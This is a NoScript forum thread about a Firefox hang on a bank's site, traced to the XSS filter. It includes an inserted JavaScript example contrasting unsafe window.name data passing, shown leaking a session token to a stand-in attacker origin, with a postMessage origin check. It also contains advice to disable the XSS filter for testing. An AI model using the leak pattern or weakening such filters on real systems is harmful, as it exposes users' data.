site bancsabadell.com hangs with NoScript

libove
Junior Member
Posts: 21
Joined: Thu Oct 07, 2010 4:39 pm

Re: site bancsabadell.com hangs with NoScript

Post by libove »

barbaz wrote:@libove: I think yours is the same issue as in https://forums.informaction.com/viewtopic.php?f=7&t=21178
I read this other thread. On the face of it, it sounds like it would be similar; however, I cannot reproduce the problem by visiting the Lloyd's bank site per the discussion.
So, while conceptually it may be similar, in its specifics it would seem to be different.

The initial reply from Banc Sabadell, useless as expected, was to use a different browser... I responded back with my credentials, asking them to escalate both to their I.T. management and to their Data Protection compliance people, who would probably care to know that a core function (being able to log in) is interfered with by the site's design when a user exercises their right not to be tracked (particularly in light of the upcoming European General Data Protection Regulation)...
Last edited by Thrawn on Tue Feb 23, 2016 2:48 am, edited 1 time in total.
Reason: Fix quote tag
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

I'm guessing you might end up seeing some messages from NoScript XSS in the Browser Console (Ctrl-Shift-J) when the hang occurs. Or that it doesn't happen if you disable the XSS filter.
If I'm right it's all the more reason that you're doing the right thing by contacting them how you are, because that crosses the line from a privacy issue to a security issue.
*Always* check the changelogs BEFORE updating that important software!
libove
Junior Member
Posts: 21
Joined: Thu Oct 07, 2010 4:39 pm

Re: site bancsabadell.com hangs with NoScript

Post by libove »

barbaz wrote:I'm guessing you might end up seeing some messages from NoScript XSS in the Browser Console (Ctrl-Shift-J) when the hang occurs. Or that it doesn't happen if you disable the XSS filter.
If I'm right it's all the more reason that you're doing the right thing by contacting them how you are, because that crosses the line from a privacy issue to a security issue.
I reproduced the hang, with the Browser Console open. Nothing about NoScript XSS at all. In fact, the messages in the Console are the same with and without the hang (except of course that, with www.bancsabadell.com allowed in NoScript, bancsabadell.com and datalog.bancsabadell.com not allowed, Firefox doesn't hang and more messages appear in the Console as I navigate farther through the site).

So, maybe this is completely different from the other, XSS-related issue.
Last edited by Thrawn on Wed Feb 24, 2016 11:55 pm, edited 1 time in total.
Reason: Fix quote tag
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

libove wrote:So, maybe this is completely different from the other, XSS-related issue.
OK so it's maybe not actual XSS or anything the XSS filter needs to act on, but it could still be that a lot of something is happening that the XSS filter is checking (e.g. the site writing data to window.name). If you try with XSS filter disabled (NoScript Options > Advanced > XSS, un-check both boxes) does the issue still occur? That's the way to be sure.
(This is NOT a safe thing to do, and I can understand if you don't want to try it. To mitigate risks of this test, use an isolated browser session - don't browse *any* other sites, not even in separate tabs/windows, while testing. And make sure to re-enable XSS filter when done.)
*Always* check the changelogs BEFORE updating that important software!
libove
Junior Member
Posts: 21
Joined: Thu Oct 07, 2010 4:39 pm

Re: site bancsabadell.com hangs with NoScript

Post by libove »

barbaz wrote:
libove wrote:So, maybe this is completely different from the other, XSS-related issue.
OK so it's maybe not actual XSS or anything the XSS filter needs to act on, but it could still be that a lot of something is happening that the XSS filter is checking (e.g. the site writing data to window.name). If you try with XSS filter disabled (NoScript Options > Advanced > XSS, un-check both boxes) does the issue still occur? That's the way to be sure.
(This is NOT a safe thing to do, and I can understand if you don't want to try it. To mitigate risks of this test, use an isolated browser session - don't browse *any* other sites, not even in separate tabs/windows, while testing. And make sure to re-enable XSS filter when done.)
You pegged it. The NoScript option "Sanitize cross-site suspicious requests" being enabled is what triggers the Firefox hang on displaying the bancsabadell.com site (with datalog.bancsabadell.com allowed in NoScript).

So, what does this mean, and what can I now provide in more detail to Banc Sabadell to help them fix their brokenness?

many thanks for the continuing efforts!
-Jay
Last edited by barbaz on Wed Feb 24, 2016 5:32 pm, edited 1 time in total.
Reason: enable bbcode
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

@libove: Please change the format of quotes if you choose to disable BBCode in your posts - e.g. do what therube does and quote email style, put a > and a space before the quote.
libove wrote:You pegged it. The NoScript option "Sanitize cross-site suspicious requests" being enabled is what triggers the Firefox hang on displaying the bancsabadell.com site (with datalog.bancsabadell.com allowed in NoScript).

So, what does this mean, and what can I now provide in more detail to Banc Sabadell to help them fix their brokenness?
Not sure. My best educated guess would be that they are using the highly unsafe practice of writing data to window.name to pass data across domains (any site can read it) and the XSS filter is at the very least scrutinizing it. But again, that's just a guess. I don't know. :|
(I also don't know whether the XSS filter logs anything to the Browser Console (Ctrl-Shift-J) even when it is disabled.)
*Always* check the changelogs BEFORE updating that important software!
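An added example, not code from the bank's site, from NoScript or from anyone in this thread, to show concretely why the window.name pattern barbaz guesses at is unsafe and what the safer alternative looks like. The origins (bank.example, datalog.bank.example, evil.example), the payload and the fake tab object are constructed for the example; the functions take a window-like object so they run under Node for illustration and unchanged in a browser console if you pass the real `window`. One caveat: the "value survives a cross-origin navigation" behaviour was true of Firefox at the time of this 2016 thread; current Firefox and Chromium releases clear window.name on cross-site top-level navigations, which removes the leak but not the reason to avoid the pattern (any same-site page, iframe or extension content can still read it).

```javascript
// Unsafe pattern: the sending page stores data in window.name and then navigates the
// same tab to another origin. Whatever page ends up in that tab, including an attacker's,
// can read the value; nothing records who wrote it or restricts who reads it.
function sendViaWindowName(win, payload, targetUrl) {
  win.name = JSON.stringify(payload);
  win.location = targetUrl;            // cross-origin navigation; the name is carried along
}

function receiveViaWindowName(win) {
  // Any page loaded in this tab can do this, regardless of its origin.
  try {
    return JSON.parse(win.name);
  } catch (e) {
    return null;
  }
}

// Safer pattern: the sender keeps the data in its own context and hands it to one
// specific origin with targetWindow.postMessage(JSON.stringify(payload), targetOrigin);
// the browser refuses delivery if the target window is not at that origin. On the
// receiving side, accept only events from an allowlisted origin with the expected shape.
function makeMessageHandler(allowedOrigins, onData) {
  const allowed = new Set(allowedOrigins);
  return function onMessage(event) {
    if (!allowed.has(event.origin)) return false;   // drop anything from an unexpected origin
    let data;
    try {
      data = JSON.parse(event.data);
    } catch (e) {
      return false;                                 // malformed payload
    }
    if (!data || typeof data !== 'object' || typeof data.session !== 'string') return false;
    onData(data);
    return true;
  };
}

// Minimal stand-in for a browser tab, constructed for this example: just enough state
// to show that window.name outlives the navigation.
function fakeTab(origin) {
  return { name: '', location: origin + '/', origin };
}

function demo() {
  const payload = { session: 'constructed-session-token', lang: 'es' };

  // window.name: written at bank.example, still readable after navigating to evil.example.
  const tab = fakeTab('https://bank.example');
  sendViaWindowName(tab, payload, 'https://evil.example/landing');
  const leaked = receiveViaWindowName(tab);       // evil.example now holds the bank's data

  // postMessage: the handler admits the allowlisted origin and rejects the attacker's.
  const received = [];
  const handler = makeMessageHandler(['https://datalog.bank.example'], (d) => received.push(d));
  const fromAllowed = handler({ origin: 'https://datalog.bank.example', data: JSON.stringify(payload) });
  const fromAttacker = handler({ origin: 'https://evil.example', data: JSON.stringify(payload) });

  return { leaked, fromAllowed, fromAttacker, received };
}
```

In a browser, `window.addEventListener('message', makeMessageHandler([...], cb))` is the receiving side; the `event.origin` check is the part that the window.name approach has no equivalent of, which is why a filter that scrutinizes cross-site data flowing through window.name has something to scrutinize in the first place.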
Costa Brava

Re: site bancsabadell.com hangs with NoScript

Post by Costa Brava »

By adding the pattern
[dangerous suggestion deleted by moderator]

to the exceptions list on the XSS tab, you won't have to compromise your global XSS settings.
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
barbaz
Senior Member
Posts: 10834
Joined: Sat Aug 03, 2013 5:45 pm

Re: site bancsabadell.com hangs with NoScript

Post by barbaz »

No. That's opening up the bank site to XSS from any site.

Please re-formulate that as an XSS exception for request of origin (@ exception) per the sticky and post back, thanks.
*Always* check the changelogs BEFORE updating that important software!